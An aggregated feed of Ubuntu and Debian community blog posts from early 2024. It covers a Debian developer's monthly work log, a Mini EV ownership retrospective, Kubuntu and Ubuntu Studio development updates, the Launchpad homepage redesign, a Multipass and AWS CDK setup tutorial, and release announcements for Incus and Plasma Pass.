Depois de uma semana intensa a cozinhar gorduras numa roulotte, eis que nos aproximamos a velocidade vertiginosa das primeiras eleições legislativas de 2024 e do fim da democracia. Mas há razões para sermos optimistas: descascámos na falta de jeito da Google; em breve haverá Snaps aos montes para Ubuntu Touch; para quem gosta, o Firefox é bom para gerir uma catrefada de abas e a Nextcloud tem ferramentas mesmo mesmo mesmo boas para vocês descobrirem. Polémica da semana para incendiar as redes sociais com títulos bombásticos e tergiversados: o Diogo odeia a Mozilla!!! \[é falso, mas o que interessa é ganhar cliques, queriam jornalismo, não?\].

Já sabem: oiçam, subscrevam e partilhem!

Apoios

Podem apoiar o podcast usando os links de afiliados do Humble Bundle, porque ao usarem esses links para fazer uma compra, uma parte do valor que pagam reverte a favor do Podcast Ubuntu Portugal. E podem obter tudo isso com 15 dólares ou diferentes partes dependendo de pagarem 1, ou 8. Achamos que isto vale bem mais do que 15 dólares, pelo que se puderem paguem mais um pouco mais visto que têm a opção de pagar o quanto quiserem. Se estiverem interessados em outros bundles não listados nas notas usem o link https://www.humblebundle.com/?partner=PUP e vão estar também a apoiar-nos.

Atribuição e licenças

Este episódio foi produzido por Diogo Constantino, Miguel e Tiago Carrondo e editado pelo Senhor Podcast. O website é produzido por Tiago Carrondo e o código aberto está licenciado nos termos da Licença MIT. A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License. Este episódio e a imagem utilizada estão licenciados nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

on March 07, 2024 12:00 AM

March 04, 2024

Two months into my new gig and it’s going great! Tracking my time has taken a bit of getting used to, but having something that amounts to a queryable database of everything I’ve done has also allowed some helpful introspection.

Freexian sponsors up to 20% of my time on Debian tasks of my choice. In fact I’ve been spending the bulk of my time on debusine which is itself intended to accelerate work on Debian, but more details on that later. While I contribute to Freexian’s summaries now, I’ve also decided to start writing monthly posts about my free software activity as many others do, to get into some more detail.

January 2024

  • I added Incus support to autopkgtest. Incus is a system container and virtual machine manager, forked from Canonical’s LXD. I switched my laptop over to it and then quickly found that it was inconvenient not to be able to run Debian package test suites using autopkgtest, so I tweaked autopkgtest’s existing LXD integration to support using either LXD or Incus.
  • I discovered Perl::Critic and used it to tidy up some poor practices in several of my packages, including debconf. Perl used to be my language of choice but I’ve been mostly using Python for over a decade now, so I’m not as fluent as I used to be and some mechanical assistance with spotting common errors is helpful; besides, I’m generally a big fan of applying static analysis to everything possible in the hope of reducing bug density. Of course, this did result in a couple of regressions (1, 2), but at least we caught them fairly quickly.
  • I did some overdue debconf maintenance, mainly around tidying up error message handling in several places (1, 2, 3).
  • I did some routine maintenance to move several of my upstream projects to a new Gnulib stable branch.
  • debmirror includes a useful summary of how big a Debian mirror is, but it hadn’t been updated since 2010 and the script to do so had bitrotted quite badly. I fixed that and added a recurring task for myself to refresh this every six months.

February 2024

  • Some time back I added AppArmor and seccomp confinement to man-db. This was mainly motivated by a desire to support manual pages in snaps (which is still open several years later …), but since reading manual pages involves a non-trivial text processing toolchain mostly written in C++, I thought it was reasonable to assume that some day it might have a vulnerability even though its track record has been good; so man now restricts the system calls that groff can execute and the parts of the file system that it can access. I stand by this, but it did cause some problems that have needed a succession of small fixes over the years. This month I issued DLA-3731-1, backporting some of those fixes to buster.
  • I spent some time chasing a console-setup build failure following the removal of kFreeBSD support, which was uploaded by mistake. I suggested a set of fixes for this, but the author of the change to remove kFreeBSD support decided to take a different approach (fair enough), so I’ve abandoned this.
  • I updated the Debian zope.testrunner package to 6.3.1.
  • openssh:
    • A Freexian collaborator had a problem with automating installations involving changes to /etc/ssh/sshd_config. This turned out to be resolvable without any changes, but in the process of investigating I noticed that my dodgy arrangements to avoid ucf prompts in certain cases had bitrotted slightly, which meant that some people might be prompted unnecessarily. I fixed this and arranged for it not to happen again.
    • Following a recent debian-devel discussion, I realized that some particularly awkward code in the OpenSSH packaging was now obsolete, and removed it.
  • I backported a python-channels-redis fix to bookworm. I wasn’t the first person to run into this, but I rediscovered it while working on debusine and it was confusing enough that it seemed worth fixing in stable.
  • I fixed a simple build failure in storm.
  • I dug into a very confusing cluster of celery build failures (1, 2, 3), and tracked the hardest bit down to a Python 3.12 regression, now fixed in unstable thanks to Stefano Rivera. Getting celery back into testing is blocked on the 64-bit time_t transition for now, but once that’s out of the way it should flow smoothly again.
on March 04, 2024 10:39 AM

March 03, 2024

tl;dr I have had a Mini EV for a little over two years, so I thought it was time for a retrospective. This isn’t so much a review as I’m not a car journalist. It’s more just my thoughts of owning an electric car for a couple of years.

I briefly talked about the car in episode 24 of Linux Matters Podcast, if you prefer a shorter, less detailed review in audio format.

Mini Mini review

Patreon supporters of Linux Matters can get the show a day or so early, and without adverts. 🙏

Introduction

In August 2020, amid [The Event], and my approaching 50th birthday, I figured it was about time for a mid-life crisis. So, after a glass of wine, late one evening, I filled in a test-drive request form for a Tesla electric car.

I was surprised to get a call from a Tesla representative the next day to organise the booking. A week later, I turned up at the nearest Tesla “dealership” in an industrial estate near Heathrow Airport to pick up the car.

I had maybe twenty minutes to drive the car alone, on a fixed route, and then bring it back. I’d never driven a fully electric car before that, nor even been in one as a passenger, that I recall. I’ve been in countless Toyota Prius over the years as the go-to taxi for the discerning cabbie.

I had no intention of buying the car, so we parted ways after the drive. The salesman was phlegmatic about this. He said it didn’t matter because now I’ve driven one and had a positive experience, I’d be more likely to rent a Tesla or talk about the experience with friends.

Not yet done the former; definitely have done the latter.

Shopping around

A year later, my pangs for a new car continued. I also took a Citroen EC5 out for a spin and borrowed a Renault ZOE. Both were decent cars, but not really what I was after. The Citroen was too big, and the ZOE had an ugly, fat arse-end.

Then I took a look at the Mini. Initially, it wasn’t on my radar, but then I watched every video review and hands-on I could find. I was almost already sold on it when I took one out for a test drive. Indeed, after telling the amiable and chilled sales guy which cars I’d already test-driven, he said, “If you drive the Mini, you’ll buy it, not the others”.

“That is a bold claim!”, I thought.

He was right though. I bought one. Here it is some months later, at a “favourite” charging spot late one night.

Chippenham charging

I’ve had many cars over the years, some second-hand, a few hand-me-downs in the family, but never a new car for me, for my pleasure. I do enjoy driving, but less so commuting in traffic, which is handy now I’ve worked from home for over a decade.

Now the kids are grown up, and the wife has a slightly larger car if we all go somewhere. I can get away with a two-door car.

Specs

I went for the “2021 BMW Mini Cooper Level 3”, as it’s known officially. The design is from 2019 and has been replaced in 2024. Level 3 refers to the car’s trim level and is one of the highest. There were a few additional optional extras, which I didn’t choose to buy.

The one option I wish I’d got is adaptive cruise control, which is handy on UK motorways. Dial in a speed and let the car adjust dynamically as the car in front slows or speeds up. My wife’s car has it, and I am mildly kicking myself I didn’t get it for the Mini.

The full spec and trim can be seen in the BMW PDF. Here’s the page about my car’s specifications. Click to make it bigger.

Specification

I went for black paint and the “3-pin plug” inspired wheels. They’re quite quirky and look rather cool at low speed due to their asymmetry. Not that I see that view often, as I’m usually driving.

Here’s what it looks like when you’re speccing up the Mini online. This is a pretty accurate representation of the car.

Ordering a Mini

Driving

The most important part of a car is how it drives. I love driving this thing. The Mini EV is tremendously fun to drive. It’s relatively quick off the mark, which makes it great for safe overtaking. Getting away from the lights is super fun too.

Being an EV, it’s got a heavy battery, so it’s doesn’t skip around much on the road. I’ve always felt in control of the car, as it drives very much like a go-cart, point-and-shoot.

Without a petrol engine, there’s certainly less noise and virbration while driving. Road and wind noise is audible, but it’s pretty pleasantly quiet when pootling around town. As required by law, it makes some interesting “spacey” noises at low speed, so pedestrians can hear you coming. Although I’ve surprised a few people and animals when they couldn’t.

Unlike the four-door Mini Clubman, it’s got long rimless doors, which make for getting in and out a bit easier. They also look cool. I’ve always enjoyed the look of a two-door coupe or hatchback car with rimless front windows.

There are four driving modes, Normal (the default), Sport, Green and Green+. Green+ is the eco-warrior mode which turns all the fans off, and reduces energy consumption quite a bit, extending the overall range. Sport is at the other end of the scale, consuming more power, being more responsive, and lighting the car interior in red, which is cute.

There are two levels of regenerative braking, which is on by default. I never change this setting, but you can. It means I can drive with one pedal, letting the regenerative braking reduce speed as I approach junctions or traffic. I rarely use the brake pedal at all.

The brake lights do illuminate when regenerative braking is occurring, which I’m sure is annoying for the person behind me when I’m hovering between go and stop. The car doesn’t come to a complete stop if you remove your feet from the pedals, so I do have to use the brake pedal to completely stop the car, which is a shame.

Driving in London

London has a Congestion Charge (CC), and (controversial) Ultra Low Emissions Zone (ULEZ). Cars have to pay to enter the centre of London. There are some exceptions. As the Mini is electric, it currently doesn’t have to pay the CC. However in order to qualify for not paying the £15 daily charge, you have to pay a £10 annual charge.

I sometimes use “JustPark” to find interesting places to put the car while I’m in London. Here I found a spot in the grounds of an old church.

Parked in London

I have always loved driving in central London, I’ve used this perk a fair few times to drive into the centre of London for work, to meet friends or go out in the evening. It’s cheaper for me to drive into the centre of London and park than it is to get a return train ticket, which is mad.

Space

It’s a two-door car that can seat two adults comfortably in the front and two kids in the back. Or four adults uncomfortably as the legroom in the back is quite cramped. I never sit in the back, so I don’t care about that.

On the odd occasion, the four of us (two adults and two teenage kids) have been in the car together, it’s been fine. I wouldn’t do a long journey like that, though.

The seats are comfortable, even for a relatively long drive, and being small, everything is very much within reach. I’m almost 6ft tall and fit just fine. However, with the seat far back, my view of traffic lights when in the front of a queue is somewhat limited. The mirror also obscures my view more than most cars, as it’s parallel to my eyes rather than “up and to the left” as it would be in a larger cabin.

There are two sunroofs, each with a manual sliding mesh shade on the underside. The front roof can be tilted or slid open using a switch in the overhead panel. The rear sunroof doesn’t open.

Interior

The interior is a mix of retro Mini styling and new fangled screens. It has a big round central circle harking back to the original Mini speedo. Here though, it contains a rectangular display. There are physical controls for air conditioning, seat warmers, parking assistance, media controls, navigation, the lot. While the display is a touch screen, that’s rarely needed when using the built-in software.

It looks like this, but with the steering wheel on the right (correct) side.

Mini interior

I should mention that I don’t like the buttons on the steering wheel, nor those immediately under the display. They’re flat rocker-style ones, which you have to look at to find. The previous generation of Mini had raised round buttons, which are much easier for fingers to find.

The built-in navigation system is pretty trashy, like most cars. I’ve never found a car with a decent navigation system that can beat Android Auto or Apple Car Play. I also like using Waze, Apple Maps, and a podcast app while driving.

In this photo, you can see the navigation display, which highlights the expected current range with the circle around the cars location. Also note the “mode” button which is one of the flat ones I dislike in the car. The lights around the display illuminate to show temperature of the heating, or volume of the audio system, while you adjust it.

Navigation

One benefit of the onboard navigation system is that driving instructions and lane recommendations appear on the Head-Up Display (HUD) in front of the driver. The downside of mobile apps on the mini is they don’t have access to the HUD, so I have to glance across at the central display to see where I need to turn. Alternatively, I could turn the volume on the mobile map app up, but that would interrupt podcasts in an annoying way.

I suspect this is a missing feature of the BMW on-board software, which may be fixed in a later release. I drove a brand new BMW which had a similar HUD that integrated with the navigation system on my phone. Mine doesn’t have that software though.

The back seats can be folded to provide more boot space, especially in a car with little luggage space. I’ve used the Mini for a ‘big shop’ with the seats folded down and can get plenty of ‘bags for life’ in there, full of groceries.

There’s the usual media controls on one side of the steering wheel, as well as cruise and speed limit control on the other. Window, sunroof and other important controls all have buttons in the expected places. A minimalist button Tesla, this is not.

There’s an induction phone charger inside the armrest. The best part about this is with Apple CarPlay, I can just hide the phone in there, charging, so I’m not distracted while driving. The worst part is I frequently forget the phone is in there, and leave it when walking away from the car.

Power

The Mini is a BEV (battery EV) instead of a PHEV (plug-in hybrid EV) - like a Prius or BMW i3, so it has no petrol engine but relies on the battery powering a single motor to propel the car.

The Mini is sold with only one battery option, a 30KwH capacity with an estimated 140-mile range. There’s a CCS (Combined Charging System (combo 2)) socket under a flap on the rear (right) driver’s side. So it can do slower AC charging or faster DC charging.

The car has all the cables required for charging from a 13-amp socket at home or a 7Kw domestic or public “slow” charger. Faster public chargers have integrated fat cables.

A few days before the car arrived, I had a charger installed at home on the outside wall of the house. I’m fortunate to have a driveway at the front of the house. So I typically park the car on it and plug in when I get out.

Sometimes, I forget or don’t bother if I know the battery still has plenty of charge and I do not have any upcoming long journeys. But more often than not, I try always to plug it in, even if it won’t be charging until the next day.

Charging

In my personal experience, most charges are done at home. I have charged in many places away from home, but that’s not very common for me. The last time I checked the stats, it had been around 86% charging at home and 14% on public chargers.

I often take a photo of the car while it’s charging in a public place. Usually to share on social media to spark a conversation about charging infrastructure. On this occasion I was using a charger in the car park at Chepstow Castle.

I know petrol heads often bleat about the very idea of waiting while the car fills up, but sometimes it leads to nice places, like this. This was a pretty slow charger, but I didn’t really care, as I had a castle to walk around!

Dragon charging

Sometimes the locations are less pretty. This is Chippenham Pit-Stop, which does a great breakfast while you wait for your car to charge.

Chippenham charging

Ohme at HOME

My home charger is made by Ohme. It has a display and a few weatherproof buttons to be directly operated without needing an app. However, a few additional features are only available if the app is installed.

The Ohme app can access my energy provider via an API which lets the charger know when is the optimal time to start changing the car, from a pricing perspective. That seems to work well with Octopus Energy, my domestic provider.

It’s possible to define multiple charging schedules to ensure the car is ready for departure at the time you’re leaving.

Ohme

The Ohme app is also supposed to be able to talk to the BMW API with my credentials, in order to talk to the car. This has never worked for me. I have had calls and emails with Ohme about this, but I gave up in frustration. It just doesn’t work.

That doesn’t stop the car from actually charging though. Indeed, according to the stats in the app (which I only discovered while writing this blog) - I’ve charged for over 720 hours at home in the last twelve months. The dip in November & December is explained below under “Crash repair”.

Ohme stats

Issues

There are a few issues I’ve had with the car.

App registration

The car has its own mobile connectivity, and talks to BMW periodically. But for that to work, you have to successfully pair the car with your phone app. The pairing process between the mobile app and the car itself should just be a case of entering the Vehicle Identification Number in the app. Sadly this didn’t work. I don’t know what was wrong, but it took around two weeks for it to be fixed.

Home Sweet Home

The onboard navigation system had my address wrong. The house number it showed for my home doesn’t exist, and mine wasn’t in the database. The house has been here and numbered correctly for over 50 years. It was only a minor thing because I happened to know where I lived, and how to get there. It just irritated me that my own car, on my driveway, thought it was somewhere else.

I called Mini customer services and they didn’t seem to think it was easily fixable, and I should just hope for a map update.

So I did the nerd thing, and found out who the map supplier was - “Nokia Here” - and submitted a request to fix the data there. Later, I got a map update from BMW which contained my fix. That’s one way to do it.

Unable to charge

Within a year of owning the car, it stopped charging at home. The AC charging port just wouldn’t work. I could charge at the fast public DC chargers nearby, but my home charger stopped working.

Unable to charge

When I reported the problem to BMW, their assumption was that the wall box on my house was broken. We disproved this by showing a different car charging from the home wall box, and my car refusing to charge from public AC chargers.

The BMW dealership were still very reluctant to accept that there was a problem with the car. I had to drive it to the dealership and put the car on their own slow charger to show them it failing to charge. Only once I’d done that did they allow me to book it in for repair the next day.

In a bit of a dick move, I drove around to empty the battery completely, rocking up to the dealership with the car angrily telling my it had 0% charge. That way they’d have to fix it to charge it to get it back to me. They did indeed fix the problem with the charging system, which took quite a while.

Zero

I got a rather fancy BMW i7 on loan while they repaired the car.

When I went to pick the car up, they were very apologetic that it took so long and gave me a bag of Mini merch as a gift. When I went to open the boot to put the bag away, I noticed that there was a panel unclipped and some disconnected wires dangling around in the boot. I had to call someone from the garage over to fix it before I could drive away.

I was a little sad that the car clearly hadn’t been fully checked over before I was given it back.

Unplugging

During cold weather in Winter, the charger plug sometimes gets stuck - frozen - into the socket. This can be quite frustrating as it’s impossible to set off to work while the cable is still attached to the house! I found some plumber grease which I smeared around the plug in the hope of lubricating and reducing the ingress or condensation of water. So far, that’s helped.

I took a wrong turn down a long A-road one night, which meant I didn’t have sufficient charge to get home without stopping to top up. I thought I’d try the internal navigation system, which has a database of charging stations.

The first location it took me to was a hotel. I drove around the car park and couldn’t find a charger at all. Not necessarily the navigation system’s fault, but the hotel signage, to be fair. I gave up, and chose the next nearest charger on the map. It confidently took me down some narrow lanes and stopped at a closed gate which was the entrance to a farm. It looked to me like a private residence.

I gave up and switched to an app on my phone, and ended up at a nearby Tesla charging station where there we many free spaces, and I was able to charge with ease. It possibly should have offered me that one first!

App nagging

As I mentioned above, there is a Mini app for Android and iOS for managing the car. In it you can do some simple things like lock and unlock the car, turn the lights on, and enable the climate control before setting off. It also has a record of charging sessions, a map for finding chargers, and other useful information like locating the car, and showing battery charge level and estimated range.

It nags you constantly to tell them how great or bad the app is, and inexplicably on a scale of 0 to 10, whether you’d recommend it to friends or colleagues. I cannot fathom the kind of person who recommends apps to friends who do not own the car which the app is for. It’s completely mental.

Rating

Every time the dialog comes up - and it’s come up a lot - I rate the app zero, and leave an increasingly irritated message to the developers to stop asking me. I have also filed a ticket with BMW. Their engineers came back to me with details of exactly how often it asks, based on how often you open the app, and the interval between one opening and the next.

You can’t turn this off. It’s super irritating, and I still get asked two years later. I still give it a zero, despite the app having some useful features.

Full flaps

The charge port is covered by a hinged flap, just like in a petrol car. The Mini recently started nagging me that the flap was open when it wasn’t. No amount of opening and closing would stop the car nagging me. Thankfully it still let me drive with a little warning triangle on screen. I let the dealership know, and they fixed it during the upcoming maintenance.

Crash repair

In November my wife was involved in a crash when someone pulled out in front of her from behind traffic. She was only minorly injured, and the car was structurally fine, but a bit smashed up at the front. The other driver was at fault, and it was all sorted out via insurance. The local BMW-approved repair centre had the car from November to January while I had a hire car on loan. The car came back as good as new.

No spare tyre

It’s a small car, so there’s no room for a spare wheel. I had a puncture recently and managed to limp the car back home. I pressed the SOS button in the car and got put through to a friendly agent.

They organised a BMW engineer to come out and change the wheel. He arrived very quickly, jumped out of his van and took the wheel off my car, replacing it with a spare he had in the van.

He then put my wheel in the boot of my car and asked me to text him know once I’d got mine fixed, so he could pick his spare up again. I got it fixed within a day or so, and left his spare somewhere safe, as I was out at work. He happily came and collected it. I was pretty pleased with this whole experience.

Maintenance

As I got closer to the two-year anniversary of ownership, the app started to remind me to book the car for a service. There’s a feature in the app to just press a button, and get taken to a page where you can book the car in. The links are all broken and always have been. I don’t have the energy to call BMW to tell them it’s all broken. They should do better QA on the app.

Eventually I just called the garage to get the car maintained. There was a scheduled two-year inspection, a low priority recall, brake check and my broken ‘fuel flap’ to fix. They had the car all day and everything was complete when I picked it up at the end of the day.

The fact that there’s no oil changes, oil filter replacement, spark plug replacments, timing chain/belts, and many other parts that fail on an EV is quite attractive. But there’s still a regular service which needs doing.

Some argue that due to the car having a one-pedal driving mode, where regenerative braking slows tha car down, drivers are less likely to wear out the brakes. However I’ve also seen it asserted that some cars actually use both regenerative braking and the physical disc brakes without letting the driver know. I have no idea whether the Mini actually “smartly” applies the brakes, or if it only does so when I press the brake pedal.

Conclusion

I love the Mini EV. I love driving it, and often make excuses to drive somewhere, or I’ll go the ‘long way round’ in order to spend more time in it. It’s not perfect, but it’s super fun to drive.

As for it being my first EV. While the network of public EV chargers isn’t amazing, there’s enough where I live and travel to service my requirements. I don’t think I’ll go back to a petrol car anytime soon.

We’re also considering replacing the wifes car soon, and will look at electric options for that too.

There’s a new refreshed Mini model out, that the local dealership salespeople seem to want me to test drive. Having seen it on video, but not in person, I’m not convinced I’ll like it. We’ll see.

on March 03, 2024 12:00 PM

March 01, 2024

First I would like to give a big congratulations to KDE for a superb KDE 6 mega release 🙂 While we couldn’t go with 6 on our upcoming LTS release, I do recommend KDE neon if you want to give it a try! I want to say it again, I firmly stand by the Kubuntu Council in the decision to stay with the rock solid Plasma 5 for the 24.04 LTS release. The timing was just to close to feature freeze and the last time we went with the shiny new stuff on an LTS release, it was a nightmare ( KDE 4 anyone? ). So without further ado, my weekly wrap-up.

Kubuntu:

Continuing efforts from last week Kubuntu: Week 3 wrap up, Contest! KDE snaps, Debian uploads. , it has been another wild and crazy week getting everything in before feature freeze yesterday. We will still be uploading the upcoming Plasma 5.27.11 as it is a bug fix release 🙂 and right now it is all about the finding and fixing bugs! Aside from many uploads my accomplishments this week are:

  • Kept a close eye on Excuses and fixed tests as needed. Seems riscv64 tests were turned off by default which broke several of our builds.
  • I did a complete revamp of our seed / kubuntu-desktop meta package! I have ensured we are following KDE packaging recommendations. Unfortunately, we cannot ship maliit-keyboard as we get hit by LP 2039721 which makes for an unpleasant experience.
  • I did some more work on our custom plasma-welcome which now just needs some branding, which leads to a friendly reminder the contest is still open! https://kubuntu.org/news/kubuntu-graphic-design-contest/
  • Bug triage! Oh so many bugs! From back when I worked on Kubuntu 10 years ago and plasma5 was new.. I am triaging and reducing this list to more recent bugs ( which is a much smaller list ). This reaffirms our decision to go with a rock solid stable Plasma5 for this LTS release.
  • I spent some time debugging kio-gdrive which no longer works ( It works in Jammy ) so I am tracking down what is broken. I thought it was 2FA but my non 2FA doesn’t work either, it just repeatedly throws up the google auth dialog. So this is still a WIP. It was suggested to me to disable online accounts all together, but I would prefer to give users the full experience.
  • Fixed our ISO builds. We are still not quite ready for testers as we have some Calamares fixes in the pipeline. Be on the lookout for a call for testers soon 🙂
  • Wrote a script to update our ( Kubuntu ) packageset to cover all the new packages accumulated over the years and remove packages that are defunct / removed.

What comes next? Testing, testing, testing! Bug fixes and of course our re-branding. My focus is on bug triage right now. I am also working on new projects in launchpad to easily track our bugs as right now they are all over the place and hard to track down.

Snaps:

I have started the MRs to fix our latest 23.08.5 snaps, I hope to get these finished in the next week or so. I have also been speaking to a prospective student with some GSOC ideas that I really like and will mentor, hopefully we are not too late.

Happy with my work? My continued employment depends on you! Please consider a donation http://kubuntu.org/donate

Thank you!

on March 01, 2024 04:38 PM

Launchpad’s new homepage

Launchpad has been around for a while, and its frontpage has remained untouched for a few years now.

If you go into launchpad.net, you’ll notice it looks quite different from what it has looked like for the past 10 years – it has been updated! The goal was to modernize it while trying to keep it looking like Launchpad. The contents have remained the same with only a few text additions, but there were a lot of styling changes.

The most relevant change is that the frontpage now uses Vanilla components (https://vanillaframework.io/docs). This alone, not only made the layout look more modern, but also made it better for a new curious user reaching the page from a mobile device. The accessibility score of the page – calculated with Google’s Lighthouse extension – increased from a 75 to an almost perfect 98!

Given the frontpage is so often the first impression users get when they want to check out Launchpad, we started there. But in the future, we envision the rest of Launchpad looking more modern and having a more intuitive UX.

As a final note, thank you to Peter Makowski for always giving a helping hand with frontend changes in Launchpad.

If you have any feedback for us, don’t forget to reach out in any of our channels. For feature requests you can reach us as feedback@launchpad.net or open a report in https://bugs.launchpad.net/launchpad.

To conclude this post, here is what Launchpad looked like in 2006, yesterday and today.


Launchpad in 2006

Launchpad yesterday

Launchpad today

on March 01, 2024 01:55 PM

February 25, 2024

I want to be able to connect to the environment using Visual Studio Code, so first we need to create a SSH key:

ssh-keygen -t rsa

We need a configuration YAML, replace <generated ssh-rsa key> with the above key, saved as cloud-init.yaml:

groups:
  - vscode
runcmd:
  - adduser ubuntu vscode
ssh_authorized_keys:
  - ssh-rsa <generated ssh-rsa key>

Assuming you’ve got Multipass installed (if not sudo snap install multipass) then:

multipass launch mantic --name ubuntu-cdk --cloud-init 

We’ll come back to Visual Studio Code later but first lets set everything up in the VM. We need to install aws-cli which I want to use with SSO (hence why we installed Mantic).

multipass shell ubuntu-cdk
sudo apt install awscli
aws configure sso

Follow the prompts and sign in to AWS as usual. Then install CDK:

sudo apt install nodejs npm
sudo npm install -g aws-cdk

Almost there, lets bootstrap1 (provisioning resources needed to make deployments) substituting the relevant values:

cdk bootstrap aws://<account>/<region> --profile <profile>

You should see a screen like this:

Create a new CDK application by creating a new folder, changing into it and initialising CDK:

cdk init app --language python
source .venv/bin/activate
python -m pip install -r requirements.txt

And that’s about it, except for Visual Studio Code. You’ll need to install Microsoft’s Remote-SSH extension:

You can get the IP address from multipass list, then in Code add a new SSH connection using ubuntu@<ip>:

Accept the various options presented and you’re there!

VSCode
  1. Bootstrapping provisions resources in your environment such as an Amazon Simple Storage Service (Amazon S3) bucket for storing files and AWS Identity and Access Management (IAM) roles that grant permissions needed to perform deployments. These resources get provisioned in an AWS CloudFormation stack, called the bootstrap stack. It is usually named CDKToolkit. Like any AWS CloudFormation stack, it will appear in the AWS CloudFormation console of your environment once it has been deployed. ↩
on February 25, 2024 10:01 PM

Plasma Pass 1.2.2

Jonathan Riddell

Plasma Pass is a Plasma applet for the Pass password manager

This release includes build fixes for Plasma 6, due to be released later this week.

URL: https://download.kde.org/stable/plasma-pass/
Sha256: 2a726455084d7806fe78bc8aa6222a44f328b6063479f8b7afc3692e18c397ce
Signed by E0A3EB202F8E57528E13E72FD7574483BB57B18D Jonathan Esk-Riddell <jr@jriddell.org>
https://jriddell.org/esk-riddell.gpg

on February 25, 2024 11:57 AM

February 23, 2024

As we get to the close of February 2024, we’re also getting close to Feature Freeze for Ubuntu Studio 2024 and, therefore, a closer look at what Ubuntu Studio 24.04 LTS will look like!

Before we get to that, however, we do want to let everyone know that community donations are down. We understand these are trying times for us all, and we just want to remind everyone that the creation and maintenance of Ubuntu Studio does come at some expense, such as electricity, internet, and equipment costs. All of that is in addition to the tireless hours our project leader, Erich Eickmeyer, is putting into this project daily.

Additionally, some recurring donations are failing. We’re not sure if they’re due to expired payment methods or inadequate funds, but we have no way to reach the people whose recurring donations have failed other than this method. So, if you have received any kind of notice, we kindly ask that you would check to see why those donations are failing. If you’d like to cancel, then that’s not a problem either.

If you find Ubuntu Studio useful or agree with its mission, we would ask that you would ask that you would contribute a donation or subscribe using one of the methods below.

Ubuntu Studio Will Always Remain a Free Download. That Will Not Change. The work that goes into producing it, however, is not free, and for that reason, we ask for voluntary donations.

Donate using PayPal
Donations are Monthly or One-Time
Donate using Liberapay
Donate using Liberapay
Donations are
Weekly, Monthly, or Annually
Donate using Patreon
Become a Patron!Donations are
Monthly


The New Installer

Progress has been made on the new installer, and for a while, it was working. However, at this time, the code is entirely in the hands of the Ubuntu Desktop Team at Canonical and we at Ubuntu Studio have no control over it.

This is currently where it gets stuck. We have no control over this at present.

Additionally, while we do appreciate testing, no amount of testing or bug reporting will fix this, so we ask that you be patient.

Wallpaper Competition

Our Wallpaper Competition for Ubuntu Studio 24.04 LTS is underway! We’ve received a handful of submissions but would love to see more!

Moving from IRC back to Matrix

Our support chat is moving back from IRC to Matrix! As you may recall, we had a Matrix room as our support chat until recently. However, the entire Ubuntu community has now begun a migration to Matrix for our communication needs, and Ubuntu Studio will be following. Stay tuned for more information to that, but also our links will be changing on the website, and the menu links will default to Matrix in Ubuntu Studio 24.04 LTS’s release.

PulseAudio-Jack/Studio Controls Deprecation

Beginning in Ubuntu Studio 24.04 LTS, the old PulseAudio-JACK bridging/configuration, while still installable and usable with Studio Controls, will no longer be supported and will not be recommended for use. For most people, the default configuration using PipeWire with the PipeWire-JACK configuration enabled, which can be disabled on-the-fly if one wishes to use JACKd2 with QJackCtl.

While Studio Controls started out as our in-house-built Ubuntu Studio Controls, it is no longer useful as its functionality has largely been replaced by the full low-latency audio integration and bridging PipeWire has provided.


With that, we hope our next update will provide you with better news regarding the installer, so keep your eyes on this space!

on February 23, 2024 10:48 PM

Announcing Incus 0.6

Stéphane Graber

Looking for something to do this weekend? How about trying out the all new Incus 0.6!

This Incus release is quite the feature packed one! It comes with an all new storage driver to allow a shared disk to be used for storage across a cluster. On top of that we also have support for backing up and restoring storage buckets, control over accessing of shared block devices, the ability to list images across all projects, a number of OVN improvements and more!

The full announcement and changelog can be found here.
And for those who prefer videos, here’s the release overview video:

You can take the latest release of Incus up for a spin through our online demo service at: https://linuxcontainers.org/incus/try-it/

And as always, my company is offering commercial support on Incus, ranging from by-the-hour support contracts to one-off services on things like initial migration from LXD, review of your deployment to squeeze the most out of Incus or even feature sponsorship. You’ll find all details of that here: https://zabbly.com/incus

Donations towards my work on this and other open source projects is also always appreciated, you can find me on Github Sponsors, Patreon and Ko-fi.

Enjoy!

on February 23, 2024 10:17 PM

Kubuntu Graphic Design Contest

Kubuntu General News

Announcing the Kubuntu Graphic Design Contest:

Shape the Future of Kubuntu

We’re thrilled to unveil an extraordinary opportunity for creatives and enthusiasts within and beyond the Kubuntu community

The Kubuntu Graphic Design Contest.

This competition invites talented designers to play a pivotal role in shaping the next generation of the Kubuntu brand. It’s your chance to leave a lasting mark on one of the most beloved Linux distributions in the world.

What We’re Looking For:

The contest centers on reimagining and modernizing the Kubuntu brand, including the logo, colour palette, fonts, and the default desktop environment for the upcoming Kubuntu 24.04 release. We’re seeking innovative designs that reflect the essence of Kubuntu while resonating with both current users and newcomers.

Guidelines:

Inspiration: Contestants are encouraged to review the current brand and styles of kubuntu.org, kde.org, and ubuntu.com to understand the foundational elements of our visual identity.

Creativity and Modernity: Your submission should propose a fresh, modern look and feel for the Kubuntu brand and its supporting marketing materials. Think outside the box to create something truly unique.

Cohesion: While innovation is key, entries should maintain a cohesive relationship with the broader KDE and Ubuntu ecosystems, ensuring a seamless user experience across platforms.

How to Participate:

The contest is open now! We welcome designers from all backgrounds to contribute their vision for Kubuntu’s future.

Multiple entries are allowed, giving you ample opportunity to showcase your creativity.

Submission Deadline: All entries must be submitted by 23:59 on Sunday, 31st March.

Prizes:

Winner will have the honour of seeing their design become the face of Kubuntu 24.04, receiving recognition across our platforms and within the global open-source community.

First Prize:

  • Global recognition of your design as the new face of Kubuntu.
  • A trophy and certificate.
  • A Kubuntu LTS optimized and validated computer: the Kubuntu Focus Ir14 Laptop or the Kubuntu Focus NX MiniPC with 32 GB of RAM – over a $1,000 value.
  • Kubuntu Focus branded merchandise up to $50 USD shipped.

Second Prize:

  • Your runner up entry featured on kubuntu.org.
  • A trophy and certificate.
  • Kubuntu Focus branded merchandise up to $50 USD shipped.

Third Prize:

Join the Contest:

This is more than a competition; it’s a chance to contribute to a project that powers the computers of millions around the world. Whether you’re a seasoned designer or a passionate amateur, we invite you to bring your vision to life and help define the future of Kubuntu.

For more details on how to submit your designs and contest rules, visit our contest page.

Let’s create something extraordinary together. Your design could be the next symbol of Kubuntu’s innovation and community spirit.

Apply now: Contest Page

on February 23, 2024 07:41 PM
Witch Wells AZ SunsetWitch Wells AZ Sunset

